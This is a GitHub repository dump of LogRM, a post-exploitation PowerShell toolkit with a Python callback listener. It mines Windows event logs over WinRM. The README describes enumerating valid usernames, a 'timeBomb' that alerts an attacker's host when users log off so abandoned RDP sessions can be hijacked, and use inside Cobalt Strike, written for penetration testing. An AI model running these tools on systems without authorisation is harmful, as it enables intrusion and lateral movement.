├── Python_Server.py ├── README.md ├── Screenshots ├── RDP_winrm.png ├── Use_is_LoggedOn.png ├── User_LoggedOn_RDP2.png ├── User_RDP.png ├── applocker_8004.png ├── applocker_8007.png ├── cobaltStrike_errorLogin.png ├── cobaltStrike_rdpconn.png ├── cobaltStrike_timeBomb.png ├── event4624_neo4j_query1.png ├── example1_.png ├── example2_.png ├── example3_.png ├── example3_users.png ├── runas_green.png ├── timebomb_notification.png ├── timebomb_notification2.png ├── user_is_loggedOf.png └── windows_defender.png └── logRM.ps1 /Python_Server.py: -------------------------------------------------------------------------------- 1 | #https://stackoverflow.com/questions/23828264/how-to-make-a-simple-multithreaded-socket-server-in-python-that-remembers-client 2 | import socket 3 | import threading 4 | import datetime 5 | import time 6 | from time import gmtime, strftime 7 | 8 | 9 | class bcolors: 10 | OKGREEN = '\033[92m' 11 | BOLD = '\033[1m' 12 | ENDC = '\033[0m' 13 | 14 | class ThreadedServer(object): 15 | def __init__(self, host, port): 16 | self.host = host 17 | self.port = port 18 | self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 20 | self.sock.bind((self.host, self.port)) 21 | 22 | def listen(self): 23 | self.sock.listen(5) 24 | while True: 25 | client, address = self.sock.accept() 26 | client.settimeout(60) 27 | threading.Thread(target = self.listenToClient,args = (client,address)).start() 28 | 29 | def listenToClient(self, client, address): 30 | size = 1024 31 | while True: 32 | try: 33 | data = client.recv(size) 34 | if data: 35 | # Set the response to echo back the recieved data 36 | response = data 37 | #timenow=datetime.datetime.now().time() 38 | currenttime = time.localtime(time.time()) 39 | print bcolors.OKGREEN + bcolors.BOLD+"Client connected "+str(currenttime[3])+':'+str(currenttime[4])+':'+str(currenttime[5])+">"+bcolors.ENDC+" User %s from host %s in not currently inside or is logged of" % (response,address) 40 | else: 41 | raise error('Client disconnected') 42 | except: 43 | client.close() 44 | return False 45 | 46 | if __name__ == "__main__": 47 | while True: 48 | port_num = input("Port? ") 49 | try: 50 | port_num = int(port_num) 51 | break 52 | except ValueError: 53 | pass 54 | 55 | ThreadedServer('',port_num).listen() -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LogRM 2 | LogRM is a post exploitation powershell script which it uses windows event logs to gather information about internal network in a pentration testing engagment. It is not only useful for blue teams but also for red teams because some of its functionalities can be used for lateral movement. You will be able to use LogRM not only on a localhost machine but also in a remote machine using WinRM protocol which is by default enabled in a newly Windows versions. 3 | 4 | 5 | ## Configuration 6 | 7 | In some cases may be you need to configure WinRM protocol to be functional 8 | 9 | On client side (attacker): 10 | 11 | winrm quickconfig 12 | winrm set winrm/config/client '@{TrustedHosts="*"}' 13 | 14 | On the server side (victim): 15 | 16 | Enable-PSRemoting -Force 17 | winrm quickconfig 18 | 19 | 20 | ## Usage 21 | 22 | Use can use the following event types: 23 | 24 | 1) Information EventID (4624) - An account was successfully logged on 25 | 2) Information EventID (4625) - An account failed to log on 26 | 3) Information EventID (4728) - A member was added to a security-enabled global group 27 | 4) Information EventID (4729) - A member was removed from a security-enabled global group (*New*) 28 | 4) Information EventID (4732) - A member was added to a security-enabled local group 29 | 5) Information EventID (4733) - A member was removed from a security-enabled local group 30 | 6) Information EventID (4756) - A member was added to a security-enabled universal group (*New*) 31 | 7) Information EventID (4757) - A member was removed from security-enabled universal group (*New*) 32 | 8) Information EventID (4738) - A user account was changed 33 | 9) Information EventID (4647) - User initiated logoff 34 | 10) Information EventID (4648) - A logon was attempted using explicit credentials (*New*) 35 | 11) Information EventID (4688) - A new process has been created 36 | 12) Information EventID (4720) - A user account was created (*New*) 37 | 13) Information EventID (4738) - A user account was changed (*New*) 38 | 14) Information EventID (4776) - The domain controller attempted to validate the credentials for an account 39 | 15) Information EventID (4634) - An account was logged of (*New*) 40 | 16) Information EventID (5136) - A directory service object was modified(*New*) 41 | 17) Information EventID (400,500,501,600) - PowerShell Logs (*New*) 42 | 18) Information EventID (8001,8002,8003) - Login using NTLM Hash (*Upcoming*) 43 | 19) Information EventID (8004) - Microsoft-Windows-applocker/EXE and DLL(*New*) 44 | 20) Information EventID (8007) - Microsoft-Windows-applocker/MSI and Script (*New*) 45 | 46 | 47 | 48 | ### Scenarios 49 | 50 | The LogRM searching into newest 10(default value) entries into all event types. 51 | 52 | ``` 53 | PS> LogRM -user -pass -ip 54 | PS> LogRM -user -pass -fips 55 | PS> LogRM -ip 127.0.0.1 56 | ``` 57 | 58 | Search into specific eventID using -eventID parameter 59 | ``` 60 | PS> LogRM -user -pass -ip -eventID 61 | PS> LogRM -user -pass -fips -eventID 62 | PS> LogRM -ip 127.0.0.1 -eventID 63 | ``` 64 | 65 | ![alt text](https://github.com/tasox/LogRM/blob/master/Screenshots/example1_.png) 66 | 67 | If you use -newest parameter then you will be able to search into a specific quantity of entries and in many cases your results will be more accurate. 68 | 69 | ``` 70 | PS> LogRM -user -pass -ip -newest 71 | PS> LogRM -user -pass -fips -newest 72 | PS> LogRM -ip 127.0.0.1 -newest 73 | ``` 74 | 75 | ![alt text](https://github.com/tasox/LogRM/blob/master/Screenshots/example2_.png) 76 | 77 | Providing the -users flag you will get as a result some valid usernames. The LogRM searches into these event IDs 4624,4625,4776 78 | 79 | ``` 80 | PS> LogRM -user -pass -ip -users 81 | PS> LogRM -user -pass -fips -users 82 | PS> LogRM -ip 127.0.0.1 -users 83 | ``` 84 | 85 | In earlier windows versions for example Windows server 2008, you can not have more than 5 winrm connections with the same host 86 | 87 | ## RunAS Functionality (New) 88 | 89 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/runas_green.png) 90 | 91 | ## Time Bomb 92 | 93 | TimeBomb is useful when you landed on a network host and you want to get a notification when the user is logged of and be able to use an RDP (Remote Desktop) connection. If the user has a remote desktop with another network host and after logging out left the remote desktop open then you could move into the network from an existing forgotten RDP connection. You can create a timer without creating or editing windows schedules and leave the host untouched. You have 3 option when you create a timeBomb: 94 | 95 | 1) now 96 | 2) once 97 | 3) trigger 98 | 99 | Timebomb uses the following events: 100 | 101 | 1) Information EventID (4624) - An account was successfully logged on 102 | 2) Information EventID (4647) - User initiated logoff 103 | 3) Information Event ID (4778) - A session was reconnected to a Window Station 104 | 4) Information Event ID (4779) - A session was disconnected from a Window Station 105 | 5) Information Event ID (4800) - The workstation was locked 106 | 6) Information Event ID (4801) - The workstation was unlocked 107 | 7) Information Event ID (4802) - The screen saver was invoked 108 | 8) Information Event ID (4803) - The screen saver was dismissed 109 | 110 | Tip1: Give as much as possible amount of entries in -newest parameter. For example: 5000 111 | 112 | 113 | ### Intro to Windows events 114 | 115 | Before use timebomb we have to learn the differences between windows events. Events 4778/4779 is fired up when the user is currently logged in and uses switch button to move quickly between users without locked or logout from his terminal. Events 4800 is fired up when the user press the button from keyboard (window+L) or with his mouse on start button press lockout. On the other hand 4801 is fired up after using ctrl+alt+del. Sometimes users uses screensavers not only for powersaving but also to lock their machines, in this case 4802/4803 are taking place. 116 | 117 | Information: In windows server 2008 events 4800/4801/4802/4803 are not created without a policy. 118 | 119 | 120 | ### Usage 121 | 122 | 123 | The task is going to run now 124 | ``` 125 | PS> timeBomb -task now -newest 126 | PS> timeBomb -task now -ip 127.0.0.1 -newest 127 | ``` 128 | 129 | The task is going to run now and if the user is logged of or if the screen saver is invoked then you will get a message. 130 | ``` 131 | PS> timeBomb -task now -newest -reverseHost -reversePort 132 | PS> timeBomb -task now -ip 127.0.0.1 -newest -reverseHost -reversePort 133 | ``` 134 | 135 | ### Discover if any user in loggedOn 136 | 137 | Using timeBomb you can discover if any user is loggedOn in the case which we want to use RDP to connect with the host. TimeBomb will make some calculation between the events and behind the scene asks the following questions: 138 | 139 | 1) Is anyone loggof? 140 | 2) Is anyone who use the switch button? 141 | 3) Is anyone who use lock-out button? 142 | 4) Is anyone connected with RDP to network host? 143 | 5) what If a screensaver is lock the host? 144 | 145 | #### Scenario 1 - User used RDP to connect to the remote host, after while host is locked 146 | 147 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/User_RDP.png) 148 | 149 | 150 | #### Scenario 2 - User is connected with RDP to remote host, is currently in 151 | 152 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/User_LoggedOn_RDP2.png) 153 | 154 | 155 | The task is going to run once at specific time. 156 | ``` 157 | PS> timeBomb -task once -at 15:00 -newest -reverseHost -reversePort 158 | PS> timeBomb -task once -at 15:00 -ip 127.0.0.1 -newest -reverseHost -reversePort 159 | ``` 160 | 161 | #### Scenario 3 - User is logged of and TimeBomb sent a notification to our remote server. 162 | 163 | ![alt text](https://github.com/tasox/LogRM/blob/master/Screenshots/timebomb_notification2.png) 164 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/timebomb_notification.png) 165 | 166 | 167 | The task is going to run and stop at specific time. 168 | ``` 169 | PS> timeBomb -task trigger -at 15:00 -stoptime 16:00 -newest -reverseHost -reversePort 170 | PS> timeBomb -task trigger -at 15:00 -stoptime 16:00 -ip 127.0.0.1 -newest -reverseHost -reversePort 171 | ``` 172 | 173 | ## Active Remote Desktop Sessions 174 | 175 | RDPConn function gets only valid incoming RDP connections into the compromised host. By using this function you will be able to observe which users from which machines have connection with our host without interrupt their connection if we tried to login with the same credentials. 176 | 177 | RDPConn function uses the following events 178 | 179 | 1) Session logon succeeded - 21 180 | 2) Session has been disconneted - 24 181 | 3) Session reconnection succeeded - 25 182 | 183 | 184 | ``` 185 | PS> RDPConn 186 | PS> RDPConn -ip 127.0.0.1 187 | ``` 188 | 189 | #### Scenario 1 190 | 191 | ![alt text](https://github.com/tasox/LogRM/blob/master/Screenshots/RDP_winrm.png) 192 | 193 | 194 | 195 | ## CobaltStrike -and LogRM 196 | 197 | You are able to import LogRM script into cobaltstrike and use powerpick or powershell to execute it. 198 | 199 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/cobaltStrike_rdpconn.png) 200 | 201 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/cobaltStrike_timeBomb.png) 202 | 203 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/cobaltStrike_errorLogin.png) 204 | 205 | 206 | ## Applocker log files 207 | 208 | In a domain environment after implementing a GPO for to enforce applocker policy, you can use log files 8007,8004 to observe malicious actions. 209 | 210 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/applocker_8004.png) 211 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/applocker_8007.png) 212 | 213 | ## Windows Defender history 214 | 215 | Windows Defender function compines 2 builtin-in powershell functions Get-Threat, Get-ThreatDetection to enumerate threat history. 216 | 217 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/windows_defender.png) 218 | 219 | ## Windows Logs with Neo4j (Upcoming ...) 220 | 221 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/event4624_neo4j_query1.png) 222 | 223 | ## Authors 224 | 225 | * TasoX (@taso_x) 226 | 227 | 228 | 229 | -------------------------------------------------------------------------------- /Screenshots/RDP_winrm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/RDP_winrm.png -------------------------------------------------------------------------------- /Screenshots/Use_is_LoggedOn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/Use_is_LoggedOn.png -------------------------------------------------------------------------------- /Screenshots/User_LoggedOn_RDP2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/User_LoggedOn_RDP2.png -------------------------------------------------------------------------------- /Screenshots/User_RDP.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/User_RDP.png -------------------------------------------------------------------------------- /Screenshots/applocker_8004.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/applocker_8004.png -------------------------------------------------------------------------------- /Screenshots/applocker_8007.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/applocker_8007.png -------------------------------------------------------------------------------- /Screenshots/cobaltStrike_errorLogin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/cobaltStrike_errorLogin.png -------------------------------------------------------------------------------- /Screenshots/cobaltStrike_rdpconn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/cobaltStrike_rdpconn.png -------------------------------------------------------------------------------- /Screenshots/cobaltStrike_timeBomb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/cobaltStrike_timeBomb.png -------------------------------------------------------------------------------- /Screenshots/event4624_neo4j_query1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/event4624_neo4j_query1.png -------------------------------------------------------------------------------- /Screenshots/example1_.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/example1_.png -------------------------------------------------------------------------------- /Screenshots/example2_.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/example2_.png -------------------------------------------------------------------------------- /Screenshots/example3_.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/example3_.png -------------------------------------------------------------------------------- /Screenshots/example3_users.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/example3_users.png -------------------------------------------------------------------------------- /Screenshots/runas_green.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/runas_green.png -------------------------------------------------------------------------------- /Screenshots/timebomb_notification.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/timebomb_notification.png -------------------------------------------------------------------------------- /Screenshots/timebomb_notification2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/timebomb_notification2.png -------------------------------------------------------------------------------- /Screenshots/user_is_loggedOf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/user_is_loggedOf.png -------------------------------------------------------------------------------- /Screenshots/windows_defender.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/windows_defender.png -------------------------------------------------------------------------------- /logRM.ps1: -------------------------------------------------------------------------------- 1 | function LogRM { 2 | 3 | <# 4 | 5 | .Description 6 | 7 | LogRM is a post exploitation powershell script which it uses windows event logs to gather information about internal network in a pentration testing engagment. 8 | It is not only useful for blue teams but also for red teams because some of its functionalities can be used for lateral movement. You will be able to use LogRM not only on a localhost machine but 9 | also in a remote machine using WinRM protocol which is by default enabled in a newly Windows versions. 10 | 11 | 12 | .Configuration 13 | 14 | Enable winrm to client side (attacker): 15 | 16 | winrm quickconfig 17 | winrm set winrm/config/client '@{TrustedHosts="*"}' 18 | 19 | On the server side (victim): 20 | 21 | Enable-PSRemoting -Force 22 | winrm quickconfig 23 | 24 | .Examples 25 | 26 | PS> LogRM -user -pass -ip -eventID 27 | PS> LogRM -user -pass -fips -eventID 28 | PS> LogRM -ip 127.0.0.1 -eventID 29 | 30 | PS> timeBomb -task now -newest 31 | PS> timeBomb -task now -ip 127.0.0.1 -newest 32 | 33 | 34 | for more examples: https://github.com/tasox/LogRM/blob/master/README.md 35 | 36 | 37 | #> 38 | 39 | [CmdletBinding()] 40 | Param([string]$domain,[string]$user,[string]$pass,[string]$ip,[switch]$remove,[string]$newest,[int]$eventID,[switch]$users,[string]$fips,[switch]$scheduler,[string]$task,[datetime]$at,[int]$loop,[datetime]$stoptime) 41 | 42 | 43 | 44 | if($ip -match '127.0.0.1') 45 | { 46 | 47 | 48 | if($eventID -eq "") 49 | { 50 | $events=(4624,4625,4634,4647,4648,4728,4729,4732,4733,4738,4756,4757,4776,4688,5136,400,600,500,501) 51 | 52 | #query all event id's and print the results 53 | for($counter=0;$counter -lt $events.length;$counter++) 54 | { 55 | $eventID=$events[$counter] 56 | start-Job -ScriptBlock ${function:logQuery} -ArgumentList $eventID,$newest | Out-Null 57 | Get-Job | Wait-Job | Receive-Job 58 | } 59 | 60 | 61 | } 62 | else 63 | { 64 | 65 | start-Job -ScriptBlock ${function:logQuery} -ArgumentList $eventID,$newest | Out-Null 66 | Write-Output "`n" 67 | Write-Output "`n" 68 | Get-Job | Wait-Job | Receive-Job 69 | } 70 | 71 | #Delete all jobs 72 | Get-Job | Remove-Job 73 | 74 | } 75 | else 76 | { 77 | try 78 | { 79 | 80 | 81 | $mycreds=New-Object System.Management.Automation.PSCredential("$domain\$user",(ConvertTo-SecureString $pass -AsPlainText -Force)) 82 | if($fips) 83 | { 84 | #Read file with IPs 85 | [array]$fileIPs=(Get-Content $fips | ? {$_.trim() -ne "" }) 86 | 87 | for($count_ips=0;$count_ips -le $fileIPs.Length;$count_ips++) 88 | { 89 | 90 | 91 | try 92 | { 93 | #$session=New-PSSession -ComputerName $fileIPs[$count_ips] -Credential $mycreds -ErrorAction Stop 94 | if((testConnectivity $fileIPs[$count_ips] 5985)) 95 | { 96 | $session=New-PSSession -ComputerName $fileIPs[$count_ips] -Credential $mycreds -ErrorAction Stop 97 | if($session) 98 | { 99 | Write-Host "Successfully connected with "$fileIPs[$count_ips] -ForegroundColor Green 100 | Write-Output "`n" 101 | } 102 | else 103 | { 104 | Write-Warning "Username or Password is wrong!" 105 | } 106 | } 107 | else 108 | { 109 | Write-Host "Port 5985 is closed ->"$fileIPs[$count_ips] -ForegroundColor Red 110 | } 111 | } 112 | catch 113 | { 114 | <# Nothing Here #> 115 | } 116 | 117 | } 118 | } 119 | else 120 | { 121 | 122 | #check if port 5985 is open before try to connect with the host 123 | if((testConnectivity $ip 5985)) 124 | { 125 | 126 | if((Get-PSSession).ComputerName -eq $ip) 127 | { 128 | Write-Host "[!] You have already open connection with the host $ip" -ForegroundColor Yellow 129 | } 130 | else 131 | { 132 | $session=New-PSSession -ComputerName $ip -Credential $mycreds -ErrorAction Stop 133 | if($session) 134 | { 135 | 136 | Write-Host "Successful connection with $ip" -ForegroundColor Green 137 | Write-Output "`n" 138 | 139 | } 140 | 141 | } 142 | 143 | 144 | } 145 | else 146 | { 147 | Write-Host "Port 5985 is closed -> $ip" -ForegroundColor Red 148 | Write-Output "`n" 149 | } 150 | 151 | 152 | } 153 | 154 | try 155 | { 156 | #Print Active Sessions 157 | Write-Output "[+] WinRM Connections" 158 | 159 | if(Get-PSSession) 160 | { 161 | 162 | Get-PSSession 163 | Write-Output "`n" 164 | Get-PSSession | Group-Object -Property ComputerName 165 | Write-Output "`n" 166 | 167 | #[string]$WinrmId=Read-Host -Prompt "Give a session's id to retrieve logs (By default all)" 168 | Write-Output "`n" 169 | 170 | 171 | if($WinrmId -or !$WinrmId) 172 | { 173 | 174 | 175 | 176 | if($eventID -eq 4625){$eventID=4625}elseif($eventID -eq 4624){$eventID=4624}elseif($eventID -eq 4634){$eventID=4634}elseif($eventID -eq 4647){$eventID=4647}elseif($eventID -eq 4648){$eventID=4648}elseif($eventID -eq 4732){$eventID=4732}elseif($eventID -eq 4733){$eventID=4733}elseif($eventID -eq 4738){$eventID=4738}elseif($eventID -eq 4776){$eventID=4776}elseif($eventID -eq 4688){$eventID=4688}elseif($eventID -eq 4728){$eventID=4728}elseif($eventID -eq 4729){$eventID=4729}elseif($eventID -eq 4756){$eventID=4756}elseif($eventID -eq 4757){$eventID=4757}elseif($eventID -eq 5136){$eventID=5136}elseif($eventID -eq 400){$eventID=400}elseif($eventID -eq 600){$eventID=600}elseif($eventID -eq 500){$eventID=500}elseif($eventID -eq 501){$eventID=501}else{$eventID} 177 | if(!$newest){$newest=10}else{$newest=$newest} 178 | 179 | Write-Output "`n" 180 | 181 | 182 | #Split session ids, add them to an array 183 | if([string]$WinrmId -match ',') 184 | { 185 | $WinrmSIDArray=$WinrmId -split ',' 186 | 187 | } 188 | elseif($WinrmId -match ' ') 189 | { 190 | $WinrmSIDArray=$WinrmId -split ' ' 191 | } 192 | elseif($WinrmId.Length -ne 0) 193 | { 194 | [array]$WinrmSIDArray=$WinrmId 195 | 196 | } 197 | 198 | #if user press enter which means all sessions 199 | else 200 | { 201 | 202 | [array]$WinrmSIDArray=Get-PSSession | %{$_.Id} 203 | } 204 | 205 | 206 | #check if user enter valid sessionID 207 | #Null sessionID = ALL Sessions 208 | 209 | for($SessCounter=0;$SessCounter -lt $WinrmSIDArray.Length;$SessCounter++) 210 | { #1 211 | 212 | if((Get-PSSession).Id -contains $WinrmSIDArray[$SessCounter] -or ($WinrmSIDArray -eq "")) 213 | { #1 214 | 215 | 216 | 217 | try #1 218 | { 219 | 220 | 221 | 222 | Write-Host (Get-PSSession -Id $WinrmSIDArray[$SessCounter] | select -Property id,Name,ComputerName) -ForegroundColor Green 223 | 224 | Invoke-Command -Session ( Get-PSSession -Id $WinrmSIDArray[$SessCounter]) -ArgumentList($users) -ScriptBlock ${function:logQuery} 225 | 226 | 227 | 228 | }# End of Try #1 229 | 230 | catch #1 231 | { 232 | <# Nothing Here #> 233 | 234 | }#close try/catch #1 235 | 236 | 237 | 238 | }# if/else #1 239 | else 240 | { 241 | Write-Host "[-] The session ID" $WinrmSIDArray[$SessCounter] "does not exist!" -ForegroundColor Red 242 | }#if statement checks for valid sessionID 243 | }# End For #1 244 | 245 | }#close if($winrmid) 246 | 247 | 248 | } 249 | else 250 | { 251 | Write-Host "[-] No active sessions " -ForegroundColor Green 252 | 253 | } 254 | 255 | } 256 | catch 257 | { 258 | Write-Output "Error!!!!" 259 | } 260 | 261 | } 262 | catch 263 | { 264 | if(!$remove) 265 | { 266 | if((Get-PSSession | Group-Object -Property ComputerName).Count -lt 5) 267 | { 268 | Write-Warning "[-] Please check again the Username or the Password." 269 | Write-Warning "[-] Maybe the specified credentials rejected by the server because of privileges." 270 | } 271 | else 272 | { 273 | $t=(Get-PSSession | Group-Object -Property ComputerName).Name 274 | Write-Warning "[-] More than 5 connections in $t" 275 | Write-Warning "[-] Use> WinRMLog -remove" 276 | 277 | } 278 | } 279 | } 280 | 281 | 282 | 283 | 284 | if($remove) 285 | { 286 | if(Get-PSSession) 287 | { 288 | Get-PSSession 289 | $WinrmSessionIdDelete=Read-Host -Prompt "[-] Input winRM id Session to Delete" 290 | 291 | if($WinrmSessionIdDelete -ne "" -and $WinrmSessionIdDelete) 292 | { 293 | Remove-PSSession -id $WinrmSessionIdDelete 294 | Write-Host "[+] You successfully remove Sessions $WinrmSessionIdDelete" -ForegroundColor Green 295 | } 296 | else 297 | { 298 | Remove-PSSession -id (Get-PSSession | %{$_.Id}) 299 | } 300 | } 301 | else 302 | { 303 | Write-Host "[-] Session table is null!" -ForegroundColor Yellow 304 | } 305 | 306 | 307 | 308 | } 309 | 310 | } 311 | 312 | } 313 | 314 | 315 | function logQuery($eventID,$newest) 316 | { 317 | 318 | 319 | #Param($eventID,$newest) 320 | 321 | if($using:eventID -eq 4624) 322 | { 323 | 324 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4624) - An account was successfully logged on" 325 | 326 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4624 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[5]}},@{Name="SourceIP";Expression={$_.ReplacementStrings[18]}},@{Name="SourcePort";Expression={$_.ReplacementStrings[19]}} 327 | 328 | } 329 | elseif($using:eventID -eq 4625) 330 | { 331 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4625) - An account failed to log on" 332 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4625 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[5]}},@{Name="SourceIP";Expression={$_.ReplacementStrings[19]}},@{Name="SourcePort";Expression={$_.ReplacementStrings[20]}} 333 | 334 | } 335 | elseif($using:eventID -eq 4634) 336 | { 337 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4634) - An account was logged off" 338 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4634 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}},@{Name="Security ID";Expression={$_.ReplacementStrings[0]}} 339 | 340 | } 341 | elseif($using:eventID -eq 4720) 342 | { 343 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4720) - A user account was created" 344 | #Get-EventLog -Newest $newest -LogName Security -Instanceid 4720 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Created Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Created Account Domain";Expression={$_.ReplacementStrings[1]}},@{Name="Created Account SID";Expression={$_.ReplacementStrings[2]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[3]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[8]}},@{Name="Display Name";Expression={$_.ReplacementStrings[9]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[10]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[18]}} 345 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4720 | Select -Property TimeGenerated,MachineName,@{Name="Created Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Created Account Domain";Expression={$_.ReplacementStrings[1]}},@{Name="Created Account SID";Expression={$_.ReplacementStrings[2]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[3]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[8]}},@{Name="Display Name";Expression={$_.ReplacementStrings[9]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[10]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[18]}} 346 | 347 | } 348 | elseif($using:eventID -eq 4738) 349 | { 350 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4738) - A user account was changed" 351 | #Get-EventLog -Newest $newest -LogName Security -Instanceid 4738 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Changed Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Changed Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Changed Account SID";Expression={$_.ReplacementStrings[3]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[7]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[9]}},@{Name="Display Name";Expression={$_.ReplacementStrings[10]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[11]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[19]}} 352 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4738 | Select -Property TimeGenerated,MachineName,@{Name="Changed Account Name";Expression={$_.ReplacementStrings[1]}},@{Name="Changed Account Domain";Expression={$_.ReplacementStrings[2]}},@{Name="Changed Account SID";Expression={$_.ReplacementStrings[3]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[7]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[9]}},@{Name="Display Name";Expression={$_.ReplacementStrings[10]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[11]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[19]}} 353 | 354 | } 355 | elseif($using:eventID -eq 4647) 356 | { 357 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4647) - User initiated logoff" 358 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4647 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}} 359 